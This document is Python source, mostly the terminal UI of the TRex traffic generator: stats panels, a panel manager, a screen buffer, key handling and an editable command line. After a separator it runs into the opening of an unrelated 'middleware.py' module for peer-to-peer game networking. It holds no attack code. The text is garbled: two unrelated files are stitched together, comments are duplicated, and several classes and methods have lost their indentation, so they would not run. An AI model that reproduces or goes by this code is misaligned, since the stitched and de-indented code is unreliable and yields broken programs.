    '''ASTF latency panel cycling between table, histogram and counters views.'''

    def __init__(self, mng):
        super(TrexTUIAstfLatencyStats, self).__init__(mng, 'lstats')
        self.key_actions = OrderedDict()
        # 'legend' is a callable here; generate_legend() calls it to show
        # which view the next toggle switches to.
        self.key_actions['v'] = {'action': self.action_toggle_view, 'legend': self.get_next_view, 'show': True}
        self.views = [
            {'name': 'main latency', 'func': self.client._show_latency_stats},
            {'name': 'histogram', 'func': self.client._show_latency_histogram},
            {'name': 'counters', 'func': self.client._show_latency_counters},
        ]
        self.view_index = 0
        self.next_view_index = 1

    def get_next_view(self):
        '''Legend text naming the view the next toggle selects.'''
        return "view toggle to '%s'" % self.views[self.next_view_index]['name']

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        self.views[self.view_index]['func'](buffer = buffer)

    def get_key_actions(self):
        return self.key_actions

    def action_toggle_view(self):
        # Advance cyclically through self.views.
        self.view_index = self.next_view_index
        self.next_view_index = (1 + self.next_view_index) % len(self.views)
        return ""
# utilization stats
# utilization stats
class TrexTUIUtilizationStats(TrexTUIPanel):
    '''Panel showing global stats plus CPU and mbuf utilization.'''

    def __init__(self, mng):
        super(TrexTUIUtilizationStats, self).__init__(mng, "ustats")
        # No panel-specific key bindings.
        self.key_actions = {}

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        self.client._show_cpu_util(buffer = buffer)
        self.client._show_mbuf_util(buffer = buffer)

    def get_key_actions(self):
        return self.key_actions
# log
# log
class TrexTUILog():
    '''In-memory event log; show() prints the newest *max_lines* entries.'''

    def __init__(self):
        self.log = []

    def add_event(self, msg):
        '''Append *msg* prefixed with the current wall-clock time.'''
        timestamp = str(datetime.datetime.now().time())
        self.log.append("[{0}] {1}".format(timestamp, msg))

    def show(self, buffer, max_lines = 4):
        '''Print a "Log:" header and the last *max_lines* entries into *buffer*.'''
        start = max(len(self.log) - max_lines, 0)
        print(format_text("\nLog:", 'bold', 'underline'), file = buffer)
        for entry in self.log[start:]:
            print(entry, file = buffer)
# a predicate to wrap function as a bool
# a predicate to wrap function as a bool
class Predicate(object):
    '''Wrap a zero-argument callable so it evaluates lazily in boolean context.'''

    def __init__(self, func):
        self.func = func

    def __nonzero__(self):
        # Python 2 truth protocol.
        return bool(self.func())

    def __bool__(self):
        # Python 3 truth protocol.
        return bool(self.func())
# Panels manager (contains server panels)
# Panels manager (contains server panels)
class TrexTUIPanelManager():
    '''
    Owns all panels, the global key bindings, the legend text and the log;
    dispatches key presses either globally or to the active panel.
    '''

    def __init__(self, tui):
        self.tui = tui
        self.client = tui.client
        self.ports = self.client.get_all_ports()
        self.locked = False
        self.panels = {}
        self.panels['dashboard'] = TrexTUIDashBoard(self)
        self.panels['ustats'] = TrexTUIUtilizationStats(self)
        self.key_actions = OrderedDict()
        # we allow console only when ports are acquired
        self.key_actions['ESC'] = {'action': self.action_none, 'legend': 'console', 'show': Predicate(lambda : not self.locked)}
        self.key_actions['q'] = {'action': self.action_none, 'legend': 'quit', 'show': True}
        self.key_actions['d'] = {'action': self.action_show_dash, 'legend': 'dashboard', 'show': True}
        self.key_actions['u'] = {'action': self.action_show_ustats, 'legend': 'util', 'show': True}
        # HACK - FIX THIS
        # stateless specific panels
        if self.client.get_mode() == "STL":
            self.panels['sstats'] = TrexTUIStreamsStats(self)
            self.panels['lstats'] = TrexTUILatencyStats(self)
            self.key_actions['s'] = {'action': self.action_show_sstats, 'legend': 'streams', 'show': True}
            self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
        elif self.client.get_mode() == "ASTF":
            self.panels['astats'] = TrexTUIAstfTrafficStats(self)
            self.panels['lstats'] = TrexTUIAstfLatencyStats(self)
            self.key_actions['t'] = {'action': self.action_show_astats, 'legend': 'astf', 'show': True}
            self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
        # start with dashboard
        self.main_panel = self.panels['dashboard']
        # log object
        self.log = TrexTUILog()
        self.generate_legend()
        # Spinner shown while connected; X/blank bar when disconnected.
        self.conn_bar = SimpleBar('status: ', ['|','/','-','\\'])
        self.dis_bar =  SimpleBar('status: ', ['X', ' '])
        self.show_log = False

    def generate_legend(self):
        '''Rebuild the two-line legend: global keys, then the active panel's keys.'''
        self.legend = "\n{:<12}".format("browse:")
        for k, v in self.key_actions.items():
            # 'show' may be a bool or a Predicate (lazy bool).
            if v['show']:
                # 'legend' may be a plain string or a callable producing one.
                try:
                    legend = v['legend']()
                except TypeError:
                    legend = v['legend']
                x = "'{0}' - {1}, ".format(k, legend)
                if v.get('color'):
                    self.legend += "{:}".format(format_text(x, v.get('color')))
                else:
                    self.legend += "{:}".format(x)
        self.legend += "\n{:<12}".format(self.main_panel.get_name() + ":")
        for k, v in self.main_panel.get_key_actions().items():
            if v['show']:
                try:
                    legend = v['legend']()
                except TypeError:
                    legend = v['legend']
                x = "'{0}' - {1}, ".format(k, legend)
                if v.get('color'):
                    self.legend += "{:}".format(format_text(x, v.get('color')))
                else:
                    self.legend += "{:}".format(x)

    def print_connection_status(self, buffer):
        if self.tui.get_state() == self.tui.STATE_ACTIVE:
            self.conn_bar.show(buffer = buffer)
        else:
            self.dis_bar.show(buffer = buffer)

    def print_legend(self, buffer):
        print(format_text(self.legend, 'bold'), file = buffer)

    # on window switch or turn on / off of the TUI we call this
    def init(self, show_log = False, locked = False):
        self.show_log = show_log
        self.locked = locked
        self.generate_legend()

    def show(self, show_legend, buffer):
        try:
            self.main_panel.show(buffer)
        except:
            # Swallow render errors only while disconnected; re-raise when
            # connected since they indicate a real bug.
            if self.client.is_connected():
                raise
        self.print_connection_status(buffer)
        if show_legend:
            self.generate_legend()
            self.print_legend(buffer)
        if self.show_log:
            self.log.show(buffer)

    def handle_key(self, ch):
        '''Dispatch key *ch*; returns True when the key was consumed.'''
        # check for the manager registered actions
        if ch in self.key_actions:
            msg = self.key_actions[ch]['action']()
        # check for main panel actions
        elif ch in self.main_panel.get_key_actions():
            msg = self.main_panel.get_key_actions()[ch]['action']()
        else:
            return False
        self.generate_legend()
        return True
        #if msg == None:
        #    return False
        #else:
        #    if msg:
        #        self.log.add_event(msg)
        #    return True

    # actions

    def action_none(self):
        return None

    def action_show_dash(self):
        self.main_panel = self.panels['dashboard']
        self.init(self.show_log)
        return ""

    def action_show_port(self, port_id):
        # Closure factory for per-port panels (panels must exist in self.panels).
        def action_show_port_x():
            self.main_panel = self.panels['port {0}'.format(port_id)]
            self.init()
            return ""
        return action_show_port_x

    def action_show_sstats(self):
        self.main_panel = self.panels['sstats']
        self.init(self.show_log)
        return ""

    def action_show_astats(self):
        self.main_panel = self.panels['astats']
        self.init(self.show_log)
        return ""

    def action_show_lstats(self):
        self.main_panel = self.panels['lstats']
        self.init(self.show_log)
        return ""

    def action_show_ustats(self):
        self.main_panel = self.panels['ustats']
        self.init(self.show_log)
        return ""
# ScreenBuffer is a class designed to
# avoid inline delays when reprinting the screen
# ScreenBuffer is a class designed to
# avoid inline delays when reprinting the screen
class ScreenBuffer():
    '''
    Renders screens on a background thread so the caller never blocks on
    redraw work: update() requests a redraw, get() fetches the newest
    rendered snapshot (or None when nothing new is ready).
    '''

    def __init__(self, redraw_cb):
        # redraw_cb(buffer) renders the screen into a StringIO buffer.
        self.snapshot = ''
        self.lock = threading.Lock()
        self.redraw_cb = redraw_cb
        self.update_flag = False

    def start(self):
        '''Start the background render thread.'''
        self.active = True
        self.t = threading.Thread(target = self.__handler)
        # Daemon thread so interpreter exit is never blocked on it.
        # (Modern attribute spelling of the deprecated setDaemon(True).)
        self.t.daemon = True
        self.t.start()

    def stop(self):
        '''Stop and join the background render thread.'''
        self.active = False
        self.t.join()

    # request an update
    def update(self):
        self.update_flag = True

    # fetch the screen, return None if no new screen exists yet
    def get(self):
        if not self.snapshot:
            return None
        # we have a snapshot - fetch it (hand it over exactly once)
        with self.lock:
            x = self.snapshot
            self.snapshot = None
        return x

    def __handler(self):
        # Background loop: render whenever an update was requested.
        while self.active:
            if self.update_flag:
                self.__redraw()
            time.sleep(0.01)

    # redraw the next screen
    def __redraw(self):
        buffer = StringIO()
        self.redraw_cb(buffer)
        with self.lock:
            self.snapshot = buffer
            self.update_flag = False
# a policer class to make sure no too-fast redraws
# occurs - it filters fast bursts of redraws
# a policer class to make sure no too-fast redraws
# occurs - it filters fast bursts of redraws
class RedrawPolicer():
    '''Rate-limits redraws: a marked redraw fires only after *rate* seconds,
    unless it was marked with force.'''

    def __init__(self, rate):
        self.ts = 0
        self.marked = False
        self.rate = rate
        self.force = False

    def mark_for_redraw(self, force = False):
        '''Request a redraw; *force* bypasses the rate limit.'''
        self.marked = True
        self.force = self.force or force

    def should_redraw(self):
        '''True when a forced redraw is pending, or a marked one is past the rate window.'''
        if self.force:
            return True
        elapsed = time.time() - self.ts
        return self.marked and elapsed > self.rate

    def reset(self, restart = False):
        '''Restart the rate window; *restart* keeps a redraw pending.'''
        self.ts = time.time()
        self.marked = restart
        self.force = False
# shows a textual top style window
class TrexTUI():
STATE_ACTIVE = 0
STATE_LOST_CONT = 1
STATE_RECONNECT = 2
is_graph = False
_ref_cnt = 0
MIN_ROWS = 45
MIN_COLS = 111
class ScreenSizeException(Exception):
def __init__ (self, cols, rows):
msg = "TUI requires console screen size of at least {0}x{1}, current is {2}x{3}".format(TrexTUI.MIN_COLS,
TrexTUI.MIN_ROWS,
cols,
rows)
super(TrexTUI.ScreenSizeException, self).__init__(msg)
def __init__ (self, console):
self.console = console
self.client = console.client
self.tui_global_lock = threading.Lock()
self.pm = TrexTUIPanelManager(self)
self.sb = ScreenBuffer(self.redraw_handler)
TrexTUI._ref_cnt += 1
def __del__(self):
TrexTUI._ref_cnt -= 1
@classmethod
def has_instance(cls):
return cls._ref_cnt > 0
def redraw_handler (self, buffer):
# this is executed by the screen buffer - should be protected against TUI commands
with self.tui_global_lock:
self.pm.show(show_legend = self.async_keys.is_legend_mode(), buffer = buffer)
def clear_screen (self, lines = 50):
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
# clear all lines
for i in range(lines):
sys.stdout.write("\x1b[0K")
if i < (lines - 1):
sys.stdout.write("\n")
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
def show (self, client, save_console_history, show_log = False, locked = False):
rows, cols = os.popen('stty size', 'r').read().split()
if (int(rows) < TrexTUI.MIN_ROWS) or (int(cols) < TrexTUI.MIN_COLS):
raise self.ScreenSizeException(rows = rows, cols = cols)
with AsyncKeys(client, self.console, save_console_history, self.tui_global_lock, locked) as async_keys:
sys.stdout.write("\x1bc")
self.async_keys = async_keys
self.show_internal(show_log, locked)
def show_internal (self, show_log, locked):
self.pm.init(show_log, locked)
self.state = self.STATE_ACTIVE
self.time_ts = None
# create print policers
self.full_redraw = RedrawPolicer(0.5)
self.keys_redraw = RedrawPolicer(0.05)
self.full_redraw.mark_for_redraw()
try:
self.sb.start()
while True:
# draw and handle user input
status = self.async_keys.tick(self.pm)
# prepare the next frame
self.prepare(status)
time.sleep(0.01)
self.draw_screen()
with self.tui_global_lock:
self.handle_state_machine()
except TUIQuit:
print("\nExiting TUI...")
except KeyboardInterrupt:
print("\nExiting TUI...")
finally:
self.sb.stop()
print("")
# handle state machine
def handle_state_machine (self):
    """Track server connectivity: ACTIVE -> LOST_CONT (on disconnect) ->
    RECONNECT (after a 5 s grace period) -> ACTIVE (on successful reconnect)."""
    # regular state
    if self.state == self.STATE_ACTIVE:
        # if no connectivity - move to lost connecitivty
        if not self.client.is_connected():
            self.state = self.STATE_LOST_CONT
            self.time_ts = time.time()

    # lost connectivity
    elif self.state == self.STATE_LOST_CONT:
        # wait 5 seconds before attempting to reconnect
        if (time.time() - self.time_ts) > 5.0:
            # move to state reconnect
            self.state = self.STATE_RECONNECT

    # restored connectivity - try to reconnect
    elif self.state == self.STATE_RECONNECT:

        try:
            self.client.connect()
            self.client.acquire()
            self.state = self.STATE_ACTIVE
        except TRexError:
            # still unreachable - go back to waiting another 5 seconds
            self.state = self.STATE_LOST_CONT
            self.time_ts = time.time()
# logic before printing
def prepare (self, status):
    """Translate the key-handler status into redraw requests and, when a full
    redraw is due, refresh the screen buffer."""
    if status == AsyncKeys.STATUS_REDRAW_ALL:
        self.full_redraw.mark_for_redraw(force = True)
    elif status == AsyncKeys.STATUS_REDRAW_KEYS:
        self.keys_redraw.mark_for_redraw()

    # nothing else to do unless a full frame is due
    if not self.full_redraw.should_redraw():
        return

    self.sb.update()
    self.full_redraw.reset(restart = True)
# draw once
def draw_screen (self):
    """Flush a pending full frame to the terminal, or refresh just the
    key/prompt area when only the keys changed."""
    # check for screen buffer's new screen
    x = self.sb.get()

    # we have a new screen to draw
    if x:
        self.clear_screen()

        self.async_keys.draw(x)
        sys.stdout.write(x.getvalue())
        sys.stdout.flush()

    # maybe we need to redraw the keys
    elif self.keys_redraw.should_redraw():
        sys.stdout.write("\x1b[4A")   # ANSI: cursor up 4 lines (over the key area)
        self.async_keys.draw(sys.stdout)
        sys.stdout.flush()

        # reset the policer for next time
        self.keys_redraw.reset()
def get_state (self):
    """Return the current connectivity state (STATE_ACTIVE / STATE_LOST_CONT / STATE_RECONNECT)."""
    return self.state
class TokenParser(object):
    """Split a raw stdin read into tokens: single characters, except that an
    ESC (\\x1b) swallows the remainder of the buffer as one escape-sequence
    token."""

    def __init__ (self, seq):
        self.buffer = list(seq)

    def pop (self):
        # consume and return the next character
        return self.buffer.pop(0)

    def peek (self):
        # next character without consuming it, or None when exhausted
        if not self.buffer:
            return None
        return self.buffer[0]

    def next_token (self):
        """Return the next token, or None when the buffer is exhausted."""
        if not self.peek():
            return None

        token = self.pop()

        # special chars: ESC starts an escape sequence - consume everything left
        if token == '\x1b':
            while self.peek():
                token += self.pop()

        return token

    def parse (self):
        """Consume the whole buffer and return the list of tokens."""
        tokens = []
        while True:
            token = self.next_token()
            if token is None:   # fixed: identity check instead of '== None'
                break
            tokens.append(token)

        return tokens
# handles async IO
class AsyncKeys:
    """Owns raw (non-canonical, non-blocking) terminal input for the TUI scope
    and dispatches key tokens to either the legend or the console engine."""

    MODE_LEGEND  = 1
    MODE_CONSOLE = 2

    STATUS_NONE        = 0
    STATUS_REDRAW_KEYS = 1
    STATUS_REDRAW_ALL  = 2

    def __init__ (self, client, console, save_console_history, tui_global_lock, locked = False):
        self.tui_global_lock = tui_global_lock

        self.engine_console = AsyncKeysEngineConsole(self, console, client, save_console_history)
        self.engine_legend  = AsyncKeysEngineLegend(self)

        # fixed: 'self.locked' used to be assigned three times; once is enough.
        # a locked TUI starts (and stays) in legend mode - no console access
        self.locked = locked
        self.engine = self.engine_legend if locked else self.engine_console

    def __enter__ (self):
        # init termios: turn off echo and canonical (line-buffered) mode,
        # and make reads non-blocking (VMIN = VTIME = 0)
        self.old_settings = termios.tcgetattr(sys.stdin)
        new_settings = termios.tcgetattr(sys.stdin)
        new_settings[3] = new_settings[3] & ~(termios.ECHO | termios.ICANON) # lflags
        new_settings[6][termios.VMIN]  = 0  # cc
        new_settings[6][termios.VTIME] = 0  # cc

        # huge buffer - no print without flush
        sys.stdout = open('/dev/stdout', 'w', TrexTUI.MIN_COLS * TrexTUI.MIN_COLS * 2)

        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings)

        return self

    def __exit__ (self, type, value, traceback):
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.old_settings)

        # restore sys.stdout
        sys.stdout.close()
        sys.stdout = sys.__stdout__

    def is_legend_mode (self):
        return self.engine.get_type() == AsyncKeys.MODE_LEGEND

    def is_console_mode (self):
        # fixed: the method was compared without being called
        # ('self.engine.get_type == ...'), so this always returned False
        return self.engine.get_type() == AsyncKeys.MODE_CONSOLE

    def switch (self):
        """Toggle between the legend and the console engine."""
        if self.is_legend_mode():
            self.engine = self.engine_console
        else:
            self.engine = self.engine_legend

    def handle_token (self, token, pm):
        """Route one token: ESC toggles engines, Ctrl+D quits, everything else
        goes to the active engine. Returns a STATUS_* redraw code."""
        # ESC for switch
        if token == '\x1b':
            if not self.locked:
                self.switch()
            return self.STATUS_REDRAW_ALL

        # EOF (ctrl + D)
        if token == '\x04':
            raise TUIQuit()

        # pass tick to engine
        return self.engine.tick(token, pm)

    def tick (self, pm):
        """Drain stdin, handle every token and return the strongest redraw status."""
        rc = self.STATUS_NONE

        # fetch the stdin buffer
        seq = os.read(sys.stdin.fileno(), 1024).decode('ascii', errors = 'ignore')
        if not seq:
            return self.STATUS_NONE

        # parse all the tokens from the buffer
        tokens = TokenParser(seq).parse()

        # process them
        for token in tokens:
            token_rc = self.handle_token(token, pm)
            # fixed: engines may return None (e.g. on an empty TAB completion),
            # which made max() raise TypeError - treat None as STATUS_NONE
            rc = max(rc, token_rc if token_rc is not None else self.STATUS_NONE)

        return rc

    def draw (self, buffer):
        self.engine.draw(buffer)
# Legend engine
class AsyncKeysEngineLegend:
    """Key handler for legend (navigation) mode: 'q' quits, arrow keys scroll
    the panels."""

    def __init__ (self, async_):
        # fixed: the parameter was named 'async', which is a reserved keyword
        # since Python 3.7 and made this file a SyntaxError on modern Python
        self.async_ = async_

    def get_type (self):
        return self.async_.MODE_LEGEND

    def tick (self, seq, pm):
        """Handle one token; returns a STATUS_* redraw code."""
        if seq == 'q':
            raise TUIQuit()

        # multi-byte tokens are escape sequences - map arrows to panel scrolling
        if len(seq) > 1:
            if seq == '\x1b\x5b\x41':   # scroll up
                pm.handle_key('Up')

            if seq == '\x1b\x5b\x42':   # scroll down
                pm.handle_key('Down')

            if seq == '\x1b\x5b\x43':   # scroll right
                pm.handle_key('Right')

            if seq == '\x1b\x5b\x44':   # scroll left
                pm.handle_key('Left')

            return AsyncKeys.STATUS_NONE

        rc = pm.handle_key(seq)
        return AsyncKeys.STATUS_REDRAW_ALL if rc else AsyncKeys.STATUS_NONE

    def draw (self, buffer):
        # legend mode draws no extra key/prompt lines
        pass
# console engine
class AsyncKeysEngineConsole:
    """Key handler for console mode: an embedded readline-like command line
    with history, TAB completion and command dispatch."""

    def __init__ (self, async_, console, client, save_console_history):
        self.async_ = async_
        self.lines  = deque(maxlen = 100)   # command history, newest at index 0

        self.generate_prompt      = console.generate_prompt
        self.save_console_history = save_console_history

        # command name -> handler, seeded from the client plus local commands
        self.ac = client.get_console_methods()

        self.ac.update({'quit' : self.action_quit,
                        'q'    : self.action_quit,
                        'exit' : self.action_quit,
                        'help' : self.action_help,
                        '?'    : self.action_help})

        # fetch readline history and add relevants
        # fixed: history items are indexed 1..length inclusive, so the upper
        # bound must be length + 1 or the most recent command was skipped
        for i in range(1, readline.get_current_history_length() + 1):
            cmd = readline.get_history_item(i)
            if cmd and cmd.strip() and cmd.split()[0] in self.ac:
                self.lines.appendleft(CmdLine(cmd))

        # new line
        self.lines.appendleft(CmdLine(''))
        self.line_index  = 0
        self.last_status = ''
def action_quit (self, _):
    """Console command handler ('quit'/'q'/'exit'): leave the TUI."""
    raise TUIQuit()
def action_help (self, _):
    """Console command handler ('help'/'?'): list all command names in bold."""
    return ' '.join([format_text(cmd, 'bold') for cmd in self.ac.keys()])
def get_type (self):
    # identifies this engine as the console-mode handler
    return self.async_.MODE_CONSOLE
def handle_escape_char (self, seq):
    """Handle a multi-byte escape sequence: history navigation, cursor movement,
    word-wise editing and prefix history search. Returns a STATUS_* code."""
    # up - older history entry
    if seq == '\x1b[A':
        self.line_index = min(self.line_index + 1, len(self.lines) - 1)

    # down - newer history entry
    elif seq == '\x1b[B':
        self.line_index = max(self.line_index - 1, 0)

    # left
    elif seq == '\x1b[D':
        self.lines[self.line_index].go_left()

    # right
    elif seq == '\x1b[C':
        self.lines[self.line_index].go_right()

    # del
    elif seq == '\x1b[3~':
        self.lines[self.line_index].del_key()

    # home
    elif seq in ('\x1b[H', '\x1b\x4fH'):
        self.lines[self.line_index].home_key()

    # end
    elif seq in ('\x1b[F', '\x1b\x4fF'):
        self.lines[self.line_index].end_key()

    # Alt + Backspace - delete the word left of the cursor
    elif seq == '\x1b\x7f':
        pos = orig_pos = self.lines[self.line_index].cursor_index
        cut_to_pos = None
        line = self.lines[self.line_index].get()
        # scan left for the start of the current word
        while pos >= 1:
            if pos == 1:
                cut_to_pos = 0
            elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
                cut_to_pos = pos - 1
                break
            pos -= 1
        if cut_to_pos is not None:
            self.lines[self.line_index].set(line[:cut_to_pos] + line[orig_pos:], cut_to_pos)

    # Alt + Left or Ctrl + Left - jump to the start of the current word
    elif seq in ('\x1b[\x31\x3B\x33\x44', '\x1b[\x31\x3B\x35\x44'):
        pos = self.lines[self.line_index].cursor_index
        move_to_pos = None
        line = self.lines[self.line_index].get()
        while pos >= 1:
            if pos == 1:
                move_to_pos = 0
            elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
                move_to_pos = pos - 1
                break
            pos -= 1
        if move_to_pos is not None:
            self.lines[self.line_index].cursor_index = move_to_pos

    # Alt + Right or Ctrl + Right - jump to the end of the current word
    elif seq in ('\x1b[\x31\x3B\x33\x43', '\x1b[\x31\x3B\x35\x43'):
        pos = self.lines[self.line_index].cursor_index
        move_to_pos = None
        line = self.lines[self.line_index].get()
        while pos <= len(line) - 1:
            if pos == len(line) - 1:
                move_to_pos = len(line)
            elif line[pos] != ' ' and line[pos + 1] == ' ':
                move_to_pos = pos + 1
                break
            pos += 1
        if move_to_pos is not None:
            self.lines[self.line_index].cursor_index = move_to_pos

    # PageUp - search older history for a line starting with the text left of the cursor
    elif seq == '\x1b\x5b\x35\x7e':
        line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
        index = self.line_index
        while index < len(self.lines) - 1:
            index += 1
            if self.lines[index].get().startswith(line_part):
                self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
                self.line_index = index
                break

    # PageDown - same search towards newer history
    elif seq == '\x1b\x5b\x36\x7e':
        line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
        index = self.line_index
        while index > 0:
            index -= 1
            if self.lines[index].get().startswith(line_part):
                self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
                self.line_index = index
                break

    # unknown key
    else:
        return AsyncKeys.STATUS_NONE

    return AsyncKeys.STATUS_REDRAW_KEYS
def tick (self, seq, _):
# handle escape chars
if len(seq) > 1:
return self.handle_escape_char(seq)
# handle each char
for ch in seq:
return self.handle_single_key(ch)
def handle_single_key (self, ch):
    """Handle one printable/control character; returns a STATUS_* redraw code."""
    # newline - execute the current command line
    if ch == '\n':
        self.handle_cmd()

    # backspace
    elif ch == '\x7f':
        self.lines[self.line_index].backspace()

    # TAB - complete command names (first word) or filenames (later words)
    elif ch == '\t':
        tokens = self.lines[self.line_index].get().split()
        if not tokens:
            # fixed: a bare 'return' here produced None, which crashed the
            # caller's max() status aggregation - return a proper status
            return AsyncKeys.STATUS_REDRAW_KEYS

        if len(tokens) == 1:
            self.handle_tab_names(tokens[0])
        else:
            self.handle_tab_files(tokens)

    # simple char - insert at the cursor
    else:
        self.lines[self.line_index] += ch

    return AsyncKeys.STATUS_REDRAW_KEYS
# handle TAB key for completing function names
def handle_tab_names (self, cur):
matching_cmds = [x for x in self.ac if x.startswith(cur)]
common = os.path.commonprefix([x for x in self.ac if x.startswith(cur)])
if common:
if len(matching_cmds) == 1:
self.lines[self.line_index].set(common + ' ')
self.last_status = ''
else:
self.lines[self.line_index].set(common)
self.last_status = 'ambigious: '+ ' '.join([format_text(cmd, 'bold') for cmd in matching_cmds])
# handle TAB for completing filenames
def handle_tab_files (self, tokens):
# only commands with files
if tokens[0] not in {'start', 'push'}:
return
# '-f' with no parameters - no partial and use current dir
if tokens[-1] == '-f':
partial = ''
d = '.'
# got a partial path
elif tokens[-2] == '-f':
partial = tokens.pop()
# check for dirs
dirname, basename = os.path.dirname(partial), os.path.basename(partial)
if os.path.isdir(dirname):
d = dirname
partial = basename
else:
d = '.'
else:
return
# fetch all dirs and files matching wildcard
files = []
for x in os.listdir(d):
if os.path.isdir(os.path.join(d, x)):
files.append(x + '/')
elif x.endswith( ('.py', 'yaml', 'pcap', 'cap', 'erf') ):
files.append(x)
# dir might not have the files
if not files:
self.last_status = format_text('no loadble files under path', 'bold')
return
# find all the matching files
matching_files = [x for x in files if x.startswith(partial)] if partial else files
# do we have a longer common than partial ?
common = os.path.commonprefix([x for x in files if x.startswith(partial)])
if not common:
common = partial
tokens.append(os.path.join(d, common) if d is not '.' else common)
# reforge the line
newline = ' '.join(tokens)
if len(matching_files) == 1:
if os.path.isfile(tokens[-1]):
newline += ' '
self.lines[self.line_index].set(newline)
self.last_status = ''
else:
self.lines[self.line_index].set(newline)
self.last_status = ' '.join([format_text(f, 'bold') for f in matching_files[:5]])
if len(matching_files) > 5:
self.last_status += ' ... [{0} more matches]'.format(len(matching_files) - 5)
def split_cmd (self, cmd):
    """Split a command line into (command, argument-string)."""
    op, _, param = cmd.partition(' ')
    return op, param
def handle_cmd (self):
    """Execute the current command line: dispatch to its handler, rotate the
    history, and render the outcome into self.last_status."""
    cmd = self.lines[self.line_index].get().strip()
    if not cmd:
        return

    op, param = self.split_cmd(cmd)

    func = self.ac.get(op)
    if func:
        # command handlers may touch the client - serialize with the TUI lock
        with self.async_.tui_global_lock:
            func_rc = func(param)

    # take out the empty line
    empty_line = self.lines.popleft()
    assert(empty_line.ro_line == '')

    # avoid duplicating the most recent history entry
    if not self.lines or self.lines[0].ro_line != cmd:
        self.lines.appendleft(CmdLine(cmd))

    # back in
    self.lines.appendleft(empty_line)
    self.line_index = 0
    readline.add_history(cmd)
    self.save_console_history()

    # back to readonly - drop in-place edits on all history entries
    for line in self.lines:
        line.invalidate()

    assert(self.lines[0].modified == False)

    color = None
    if not func:
        self.last_status = "unknown command: '{0}'".format(format_text(cmd.split()[0], 'bold'))
    else:
        # internal commands return a string to display as-is
        if isinstance(func_rc, str):
            self.last_status = func_rc

        # RC response
        else:
            # success
            if func_rc is None:
                self.last_status = format_text("[OK]", 'green')

            # errors - show the first message plus a count of the rest
            else:
                err_msgs = ascii_split(str(func_rc))
                if not err_msgs:
                    err_msgs = ['Unknown error']

                self.last_status = format_text(clear_formatting(err_msgs[0]), 'red')
                if len(err_msgs) > 1:
                    self.last_status += " [{0} more errors messages]".format(len(err_msgs) - 1)
                color = 'red'

    # trim too long lines
    if ansi_len(self.last_status) > TrexTUI.MIN_COLS:
        self.last_status = format_text(self.last_status[:TrexTUI.MIN_COLS] + "...", color, 'bold')
def draw (self, buffer):
    """Write the hint line, the status line and the prompt with the current
    command line into *buffer*."""
    buffer.write("\nPress 'ESC' for navigation panel...\n")
    buffer.write("status: \x1b[0K{0}\n".format(self.last_status))
    buffer.write("\n{0}\x1b[0K".format(self.generate_prompt(prefix = 'tui')))
    self.lines[self.line_index].draw(buffer)
# a readline alike command line - can be modified during edit
class CmdLine(object):
    """One history entry: an immutable original line (ro_line) plus an optional
    in-place edit (w_line) with a cursor, readline-style."""

    def __init__ (self, line):
        self.ro_line      = line
        self.w_line       = None
        self.modified     = False
        self.cursor_index = len(line)

    def get (self):
        # the edited text when modified, the original otherwise
        return self.w_line if self.modified else self.ro_line

    def set (self, line, cursor_pos = None):
        self.w_line   = line
        self.modified = True
        self.cursor_index = len(self.w_line) if cursor_pos is None else cursor_pos

    def __add__ (self, other):
        # only in-place append (+=) is supported
        assert(0)

    def __str__ (self):
        return self.get()

    def __iadd__ (self, other):
        # insert 'other' at the cursor and advance past it
        text = self.get()
        self.set(text[:self.cursor_index] + other + text[self.cursor_index:],
                 cursor_pos = self.cursor_index + len(other))
        return self

    def backspace (self):
        # remove the character left of the cursor
        if self.cursor_index == 0:
            return
        text = self.get()
        self.set(text[:self.cursor_index - 1] + text[self.cursor_index:],
                 self.cursor_index - 1)

    def del_key (self):
        # remove the character under the cursor
        text = self.get()
        if self.cursor_index == len(text):
            return
        self.set(text[:self.cursor_index] + text[self.cursor_index + 1:],
                 self.cursor_index)

    def home_key (self):
        self.cursor_index = 0

    def end_key (self):
        self.cursor_index = len(self.get())

    def invalidate (self):
        # drop the edit and become read-only again
        self.modified     = False
        self.w_line       = None
        self.cursor_index = len(self.ro_line)

    def go_left (self):
        self.cursor_index = max(0, self.cursor_index - 1)

    def go_right (self):
        self.cursor_index = min(len(self.get()), self.cursor_index + 1)

    def draw (self, buffer):
        # write the text, then backspace the terminal cursor to cursor_index
        buffer.write(self.get())
        buffer.write('\b' * (len(self.get()) - self.cursor_index))
|
middleware.py | """
All sockets used by this program live in this module; no sockets are created
anywhere else. Each TCP connection runs its own socket in a separate thread
(multithreading), and one additional thread hosts the UDP socket used for
broadcasts.
"""
import uuid
import threading
import socket
import ipaddress
from time import sleep
usleep = lambda x: sleep(x/1000_000.0) # sleep for x microseconds
from dataclasses import dataclass
######################################### PARAMETER Constants
BROADCAST_PORT = 61424
BUFFER_SIZE = 1024 # bytes
MSGLEN = 10000 # bytes? # maximum length of message over tcp
SUBNETMASK = "255.255.255.0"
BROADCAST_LISTENER_SLEEP = 10 # microseconds
IP_ADRESS_OF_THIS_PC = socket.gethostbyname(socket.gethostname())
net = ipaddress.IPv4Network(IP_ADRESS_OF_THIS_PC + '/' + SUBNETMASK, False)
BROADCAST_IP = net.broadcast_address.exploded
class Middleware():
    """Peer-to-peer game middleware: UDP broadcast/unicast plus TCP unicast,
    ring heartbeats, leader election and ISIS-ordered reliable multicast."""
    #deliveryQueue = Q()
    # NOTE: the attributes below are class-level (shared) state, mutated from
    # several threads
    ipAdresses = {} # {uuid: (ipadress, port)} (str , int)
    MY_UUID = '' # later changed in the init, it is here to define it as a class variable, so that it is accessable easyly
    neighborUUID = None      # uuid of our current ring neighbor (or None)
    neighborAlive = False    # set by _listenHeartbeats when a ping is answered
    orderedReliableMulticast_ListenerList = []
